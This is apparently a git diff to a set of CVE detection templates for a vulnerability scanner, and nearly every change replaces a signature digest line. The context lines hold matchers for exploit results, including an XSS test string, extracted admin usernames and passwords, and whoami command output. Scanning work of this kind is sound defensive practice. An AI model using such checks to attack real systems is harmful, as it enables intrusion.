4a0a00473045022100d4ea7f06a84e16fe857d3fb6c8b915ddd7c277fa55d2b0b7341954486290763502202b6315a3b0fea762b9c94cf5ce30c251a14e7b0ac555ad55dad8d54b799b841d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205dac386f1ddec8300f0a7c85361f7480cbc306df48e2ff420beedd4ee5e4850202210092a8e9a1101576570f1511930badc76b41235ab03f7b1227608718ee48148d52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1892.yaml b/http/cves/2023/CVE-2023-1892.yaml index b645cbf988..83b1cc6592 100644 --- a/http/cves/2023/CVE-2023-1892.yaml +++ b/http/cves/2023/CVE-2023-1892.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220709cb3b14207ada2e026411d050b57c58e1f48f91202bb50481bf3ba342b32bf022016e81e67e363424bb053a774a26a9f93bc8f50bbb22ef7fc04d365e716c763ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c298fb5462949d2c0b4c37fe2b6f43a82cf04f52f0d463d2683e836bb1d02b2022100d3a58d90f4dead648a4149fffad2b4862828a2de55ca75a95ad4cf78b4ae40f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index abb4f85238..468f790506 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -80,4 +80,4 @@ http: part: body_3 words: - "{{html_comment}}" -# digest: 4a0a0047304502203543e37991008a86e6d6545f9b12ce7a9569148a72e2b69c5590d5a736a674cd022100c607440c608f5ca67437751859806a3700c511f68f54f71ac8f50a63b0335fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ecacf409865531df27981f30bbbeb4ea2c9feacbcb8c957049c6b37b2f6e08d02205f9b37f3cc2bd352168298cd1775310eb1fb0ee10efe1c5f210b6b41b7b603e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index c026ccc8b8..2583aa00c9 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -61,4 +61,4 @@ http: group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' -# digest: 4a0a004730450221008d6f1b11e38f9c8eefd91b79603bf5b7eb468702c923563b993e1ba8bc58a3e502203dfa0040b3fad85659dd26b3941e38eed7bd7a42b71ad9e85a926a7a37f318ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c6f372018946b3beaebd415920a5e6d1d8e71304811c3e7a1c1222e5e7a86604022012cbef1c55c540370121766fc643289378a91577e7f87e46421634f256235c7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 13fa0f3d0d..b9e6b6dc4d 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -51,4 +51,4 @@ http: - contains(body_2, "onanimationstart=alert(document.domain)//") - contains(body_2, "Custom 404 Pro") condition: and -# digest: 4a0a00473045022100cd38bff86e643f91db88d9a1590d35b1839285be73b6dbc31c8f0b1ad50f57020220594ae2e7d9f3dbf289a732848e92543eb02be8752b29df3f8de781957d536475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ffbdca1dcfe309a8d8b09ff9fadc17e0082cd9a9841a9576be790a6570c9cffb022100bb9aa9a7bd2885181381d4c61929384437cb98432da45a3d913dd03bc1fdf7bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index d0b1f9cc3e..8bf8628411 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022011648b7817f4854aa279b9f331d26ac1f4c03e23eca21457ee72d3397588b7140220513fe0ffaebd0415deced1853ffb70ac950380da12a680d10e4be106aa47913a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b78b70e35d7ae097b09444766c14d99558d97b9a988c68a33b2ef51f72d18bd0221009ed5a6d532cd23a04171350e21b4c0a4a8da0f3519b0a3c50468f0cd49521398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 8c6a99bf46..e9557df7b7 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -65,4 +65,4 @@ http: internal: true kval: - "X_CSRF_Token" -# digest: 4b0a00483046022100d81a1f67f8e41f50b8995bae686ab49b507ce0fa2517c60658b8ac8630d9871a022100def2a9f72d0bdacf1fba5cc1236dac40a103ff7edb620cff13fc41f501660326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220217a4161f5d33b558b5e1a5f9cc3022399c2917d68142b7efd0cbc2bef5b9416022021067a8d5837587fcb3fd09cd0f9a8687351646f3756e6dc7b47e1093c686c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index ac840d783e..7821e0fcf0 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cef3e5e34cd635c23cf32fc104b9c643bc4b812046fc3e8ab1f2e0237b0c98c6022041d25ffbcfc8ed708d8e3cce28043e53ef71343b3a31238d065ba9f7e9d0f22a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220078674432fdbe4bcc3e9ae1cfbf13e4a96cf8e8a8c453600e3aff2da336e476e022100a0b4931ccdeaef487fa74cef44cd586f54177eb42f22c5344d688b35a272fc15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 9266fed72d..de873a4c1c 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -67,4 +67,4 @@ http: - 'csrfToken":"([a-z0-9A-Z/+=]+)"' internal: true part: body -# digest: 4a0a00473045022100fe3fd06bbd0a82bf33a0611564f97011c559e4cb49524a0a37df553c037ab05f02205cd1eae8785402529378a446c8007225d04aa7f647bb94f439d1b8dc33ab27db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004659117a94dd175c3f64942542c9f5c70bd990758add2155a9a819489465fb8022100dabf13a217b43a0cc4c1e51d04df3d0a23ea6c8acdf50ea4f6d42e386d13c7d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index 979a90e51f..26c0802963 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -88,4 +88,4 @@ http: - csrfToken":"([a-z0-9A-Z/+=]+)" internal: true part: body -# digest: 4a0a004730450221008a1f0e02f6eac19878f28e73d5af976689cb0985da1e466a9ec0ec62c50c490002205fb72bf2476805961a6bb628582a35b82e6ae23650edd78967e82247099c3308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022055b10fc56ee43cdb8ca9c694251abb76a7705cdcbede4f4f70fdcf5571f7a5b502201c3ab21258337ff42f17b2eefe0b93936df34bf1675d361b0c5d3e3f634bf301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index bfeaa51bfe..6985485ce7 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -47,4 +47,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Image optimizer")' condition: and -# digest: 490a0046304402205fa4a6a8bcbf2bab629155a7f4d02eb527d8635fd7393c5f399f423ee4cf8557022004a188c53439a2e745d2c34e4e734f4bf64d17d500314d2585f1a7c94badc180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff7eec23d31c4531488ff4f882dea2d85dc65b726ccc6fa85783372d799fce38022100acd0f707b454a6339756cba8d26a33028d885b6b685c2c6c4c2757babac9e5c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 0e5d746ec9..6056d6df45 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -44,4 +44,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "Supplier Name")' condition: and -# digest: 4a0a0047304502207610615b4d86f3776d899e52606e2d73d1e13ab8f1be83473221d6e08f7d7ac6022100c166cf185ded4ffb6629ece50af08cbb3480f06e618e633086ebf6bf5b2de618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008eedd613cb556e22c44c4adb41769b57907a6fc43c8de121b942339738e6bb6102210093d2e29ef6542d0d18cc3e9a1cbedf51462c61250e47f1a3ed1e83f009a3052e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index 1542ee4351..e1f8bdd6b9 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "page_aajoda-testimonials")' condition: and -# digest: 4a0a00473045022100c74aeac54fc01cd88a31d603a084a840be0d2f754b0ef7b7bdebe414e15f8a8902201f30b83a2348f3b8479b1ff813a3d43c0d3e753579da02c956e300a33f94eb5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8e5a63e79c6b4ec11e580b7171aeb1565b9cea7a93e3f3b319c86f146b988f4022100837c8e9be1ea6bfa4b45912eb8c52e27444309294181ba829334a2b88b5e84cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index f6a39ea7ba..701aa352e2 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d2644b825543fc67f02663f2acb50beba0821a8bfc2bc784906c2212b716c165022100fbf55e2f84b2a12206b0c96e16aa7f81405c4f6d3e40e73fbd909f2a5deb5583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f2592d7f4a8f1ad6d2b193ebd92421aa8ce79cced2f737da59684c8d24fb431022100ea7fc81dac4971b7982afcaf1ee0f57bb291278076a22670eb8cc511b40fbe2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index 35dfc7eedd..fa1d8fe4ce 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -68,4 +68,4 @@ http: regex: - 'name="nonce_wdseo" value="([a-z0-9]+)" \/>' internal: true -# digest: 4b0a0048304602210094d1da811d59592837714673bb306836a768a2450c197630671c366a384f87e9022100f3be739f36993a986b5f670b0004217e59026284faa1930c92203169e6fbfa64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100893365651019a48974c7772404a1a5e1bf1c27191b6661d84a796cb9fedcc462022100bba9224e520251fcd68ade3f4fbcfa7557380dfd77eeec46970f3ea8f930d78a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml index de72d1556a..b626b9186c 100644 --- a/http/cves/2023/CVE-2023-2227.yaml +++ b/http/cves/2023/CVE-2023-2227.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ab95cad35e5dc938efd7d6b61c067c225b1b5db05ba420a90b83c3e944f7e43022044d08dd4379dc38acdb9b5a5aeb2cffcd30d0a608aea1c9e622135c2f087db39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220653e5fe2976692c3c881761bdc58112c952b2c144074c8042a66f4521467dfc00221008236c69d7bbe67c34bed553ea0870b8f1419031871e38a1644213017c0949d21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml index 6083bb470a..8291fc8a27 100644 --- a/http/cves/2023/CVE-2023-22432.yaml +++ b/http/cves/2023/CVE-2023-22432.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 303 -# digest: 490a0046304402207f782b159b26b41f6b49ca4263a7106cbc2ef40aba7e1c835f44948dcd5c9731022035bed350905f56247f1d8d9aef6e107d58accb233e8ebb5bc8e8e2f78363f2c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e32d205cdc41979a8510ec3c5491b73e578f35e1f2c728a0834360098b8c21502203fc65ab87a9ec06204ed5ee8392f6a8063e68afa34cdd393f968fe8081616137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index 31e7f7266f..f677a152bf 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -78,4 +78,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022048f769f84bc3e713a4aaf0510d2310cf2fa4c1f267e818f139d8c2c695d75af6022035cac70cbbb1ca8758491a2c026365cf8f96d067cdb375d4f3f2570a28171663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220426a8d82659122f39b1e0704f4854f0d4f6b4f2567d07705a37749887bcebf6b022100f6e1952745c3cec3bf7f8248f1c0fa04d58a0aab1fd86e65cab496dc4dfac1dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index a597b15ad2..24be618612 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a3a8ab93d344a4ea4552af7e38e910f1d753961585a43185a1c2aceb03385e1022100a393cf6a17ba4fc35342bd2c698a9bc9fb108546b52580c6bff53c0a76f26fe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f2dc7521c04ad3d5386510be4e09f0631e6d709fe85d9489449847ade8f7e892022100b6256d0260f230a9a6fe5d4ea8c10a629218c2b7eb52ac89a9bcf4406692980c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index 5e9e4c3848..0f00ff096a 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee12904d65e9c992c05a8c326ff56e80b778ef16acda7ced68f94e57609f2c58022100cb41bf91ee715b8d3da808ba74a8e3bf043eb12511541341d3ede714a88843e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220253eb38bfa15b32b565d0d52729a0d49290b60292a800854d9f767c96b77ab7b022058b19983a77756f40936f9dbf16bce4b071ab4a0eb65d5832c1dbac9b819bf0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index 42bdbd181c..bb491ff74f 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -80,4 +80,4 @@ http: dsl: - '"USER: "+ username' - '"PASS: "+ password' -# digest: 4a0a00473045022100ac6a95dafe4fdeff2f77958d55a402758e31fd3369fc22f5db6c8b1ea6951ec7022071d32dfbe93ae322d8d02e50d17dd9bbeace387055752ba20184441546549d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c2e72b3a46b67fa6502325f5c5bc179706e5ce1e349454522f1e336215dc27b02204a79690ff8837f5737d444a08704269bfa1db14661d196aecec6ca17238ff13f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index 60b9df90e3..077317adf8 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -59,4 +59,4 @@ http: - "status_code == 200" - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')" condition: and -# digest: 4b0a00483046022100bfe2427057a021c02b45e8933fad188130ca08bbb54211b7d88907f02834dce6022100d073c6584b72693b5d1493b8fc4df8ff572a6c26046d83a428f83dfba54cec0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021d971dc8fe578f1e5f5ce2badbea31b706f6b7e2381821e537412885b0b92b402201de72236af715dca5a31bf2584f4c350a1bffefdcd3b6b9c06ed2310c47c52bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index af36609021..bb6c9943ea 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022076aa83db4416dab98b44af5bbef532fbcc276d86523e0cbb68791c6f23624d9202204df4ce1bc02f82a0e4f75d2b8dbdc207c612b747fd45f47dc8ba90350a1674a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f2decf34789a5809be2140d5c00a0c4197394a365b52d684aa03652b9274511022100e57b85ad71d947a8fcd9a3c2caff691db97c565be9493fbcdea1969241dabb92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index 3e8b5fb5f5..8ccbc1aa8a 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -50,4 +50,4 @@ http: - type: dsl dsl: - x_vuln_check # prints the output of whoami -# digest: 490a0046304402207a2fdad5fe27eb6c457c1bdac60461a10e3dd24f3b61a3883903ef1492f18d7202203ef5a8e34b86a3e1e139c76a3daee72643cb00ae3205564fa729bf4ce9a148ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc1071e5e566ae86e5182333bd3d7a6c8ae42216e60b42a51f6d0caf6d4b563f022100efb619a364faf3da600dd66d185b85d4c528abb80303ba80338a9c8c51b4a672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index 43abde8090..d8131fbb09 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -73,4 +73,4 @@ http: regex: - '"sessionid": "([a-z0-9]+)"' internal: true -# digest: 490a004630440220534282c43668c1c17af9cf7ca5cdb4ae4bbf009790f5d229d10fbd4129fe1b34022073d7f8756dba9051bceecff5bb2af4da03f6abfd1f4becbb46f585324c435ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203539abafafbf0bca15ce3302802af0f0456908310129b09f231f8712a23da38b02206a15655120ce0acb4c72c179916a9a2b01677792f5d88b73f3299b05fb4ffb36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index c852e683c0..b90affafa9 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Tiempo")' condition: and -# digest: 4a0a00473045022100e95f455156aec7ad579fbca4f3894390f4c3828cdfb03bdc3f1476c3194bac0302205af112e2d4a7bd057125852239530818792a4b650e41ff76eb49e3d5fe85c594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e5df4e755941197a8a9e2b7ea2c47fa26d6a10d4761122622cc0af24b7ffba7e02205cd5b5968e669da5518df4c6dc585b02292aada0f3eb00691be0ba9acd56b59c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 5cebe1e454..f8a9a46def 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c5379821457ef92f3e634b3aa210084805f8dfebe4025face5ad541fa49a074802206972fe09c5c8eafeb44d04cbda0c68080ea1354dc53a9c44f5d65a679d398e06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8fade8a9a8fefd9bbec8924947c2381ced72d0aa735a8a0d52f6556249f7a67022100cd34d8ad4cb2d735c5cfbc8a38d0d054dd5c95a9d3f8512127ac85d535ea7ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 6a6de73694..96e550d512 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea898a0ee3e7998bb3be0741ebb31686b6746789bfc38aa09c3d751d6c088dd9022100f24fab6cecd2ddc7672fa6f8c51dfc9851aed21ab09178b2994b03ef0a42b92c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100891756170ebb7d1c8fc3b2cea372a6b589d3582e1c83e28fbfd495196c4ad765022100c4cf50470f6f470682a20372817779dd9f94f25c2a451986a4189fe3a8a2a464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index 870e53afa4..f02c6d26df 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207bfb7fc9356679873674bfb87b497551fbe9df9d6015d6c609aad585022a83ec022100eb1090e63e1b40864063314df8fad93909dea07395360cb4ec508212ee04d940:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009c57b83498f88294e948cfa0e482499061ced121949be027b7a730ddcaf61100022066dcd5b777f3b89c82652d0780d0f4c11be38a15a61de976da7d10375deb3e3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index 230471e3c6..9c9afb6f06 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -53,4 +53,4 @@ http: - status_code_1 != 403 # Wordfence - contains(body_2, "pmpro_updates") condition: and -# digest: 490a00463044022015c188952fcdb9afb70b9a5d2751a7a6b30e64a2e70652f54f09e9f340e236f202203acc5d2c37b01961a2b0901d983aa12ac70bfef13910d8cb846454bb17078d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207aa83e6f293f332c02d8a9ada084af631fa84e58635b0ee65df029638fbd3409022048777f3132bb7ea017b47e5853e7742ade34d05d38b4da9edd3d8380dd197634:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index 21341d813d..3238ae18db 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -49,4 +49,4 @@ http: - 'status_code_1 == 200' - 'contains(body_1, "[]") && contains(body_2, "Easy Digital Downloads")' condition: and -# digest: 490a0046304402202404926dcf3a6a42dccec5b59e3d4dc2a13748530e430330c1563e0d676d440002207238a9a44101263d3b8d936b7e391dd9274756d519f77c7f49df13faab120930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce855e670e183a3c0c3f09471253246615d2b5faf6c6e9d1156669c259f16abe02202d77885086d1d097ed3172a6980ca5784d9c874d2bd06d38c32e8128a197e0a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index 0dbd72dd1e..3e1d00cb18 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -44,4 +44,4 @@ http: - 'contains(body, "")' - 'contains(body, "qem_calendar")' condition: and -# digest: 480a00453043021f3e95e9556a9b9ec5ade59d7f4572f3867d7c2c8a1d7b95ae257a372f41c7ea02203ca63137dbaab35e0a9cd15cdc7b6002cf777667358a298c96fe3f5703172f5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a228a7862f653f746c8a54358638b762b4f431d226ad393cfcee63002d646ad002210089dfd526bc3fb3e3a4b6d2d7fe00fc7f64cf427ff96502715c2df1956d4d494b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index 5eed092666..1b3226dc7e 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b3170213b0f1a447866043356305b581a32458c87e9ec2841fba4480f233cf07022100ac9d1b4b13994df1e15d76984cc662270f9540f5910faed4c46ee75e5297fb81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011d1689f5448355a69a24aed9e5d0f916586008da1dbac8cd0605f9726d70b28022100aa03325f5120eb1358d6c1ea5e0b67037507a78ead26f9934782a7b27d56214d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 32942a9671..82fb7bb236 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -72,4 +72,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4a0a0047304502201dc691af618aeb7ae1784f119f04c2ae83a05a8b759601debe738dd5c11308e1022100a5df5635703f52bc26e0ed9760ccc09d6f92a23a35e8c13c9b272a203d54b34a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008e337edd5fc7cd4ffe717d48ac5217c2c11ffc2aef83df2bd066df168ee4cd410221009a00492b8a190c833bf7e77a791a5735edbce79ec4ee0257d9d2ddb300f32221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index def70983fc..101c556043 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f1a8859b2be34845c6e9ff983c9ab9fc1741ee2e59af7319158de1e37c2002850221009b6444bdf0c4f9f9c9da30901088c17b893d690461a859cb5a97e2488a963ce2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220365ee0f73788da3e66ee9797c957e719253f33c9506e0d7c2c89d97726f8e8340220026a8ffab7377814fb519871b7eb68dc65593207bf22d27c3a7870aa89c309f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 8ffeb915f2..9da9704b3e 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 303 -# digest: 4a0a00473045022069dc022651b4fb9af6a01bd55d548680f03edd9debffa187316d1b018f1209cc022100c92c5328721c039369314c3c7035951e413c56f1862f781e9d73bac65cfa6719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f1f13980cd4248460f9b3b1861ba42a2bf081a0f62b990f1d8bc96e110664600220583f1bfff336bd27130c8b75bbef19662bc3aa44c1d6e1824dab2bb02cac91b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index 276c8e855f..852978493c 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ 